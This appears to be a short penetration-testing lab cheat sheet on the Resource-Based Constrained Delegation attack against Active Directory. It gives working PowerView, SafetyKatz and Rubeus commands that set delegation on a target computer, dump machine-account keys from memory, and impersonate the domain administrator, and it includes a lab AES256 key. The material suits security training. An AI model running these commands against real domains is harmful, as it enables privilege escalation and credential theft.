Resource-Based Constrained Delegation (RBCD)

What is RBCD Attack?

Resource-Based Constrained Delegation (RBCD) is a technique that allows a computer's owner to decide who can delegate authentication to it. Unlike traditional delegation, it doesn't require Domain Admin privileges. If an attacker has write permissions (GenericWrite or WriteProperty) over a computer object, they can modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to allow a machine they control to impersonate any domain user (like a Domain Admin) against that target.

Enumeration

PowerViewAD-Module

# Find computers where a compromised user has write permissions
. C:\AD\Tools\PowerView.ps1
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}

# Check if RBCD is already configured on a target
Get-DomainRBCD -Identity dcorp-mgmt

# Checking attributes manually
Get-ADComputer -Identity dcorp-mgmt -Properties "msDS-AllowedToActOnBehalfOfOtherIdentity"

Explotation

Configure Delegation

PowerView (Set RBCD)

# Granting your student VM permission to delegate to the target
Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std544$' -Verbose

Extract Machine Keys

SafetyKatz

# Extract the AES256 hash of the machine account (the one ending in $)
# Look for Authentication Id: 0;999 (SYSTEM session)
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::evasive-keys" "exit"

Impersonate Administrator

Rubeus (S4U)

# Request a TGS for the Administrator user and inject it into memory (/ptt)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-std544$ /aes256:44219e614e95a77d35ea874854eb6195a5d0f2efde85b2ed98d3481ca1638805 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt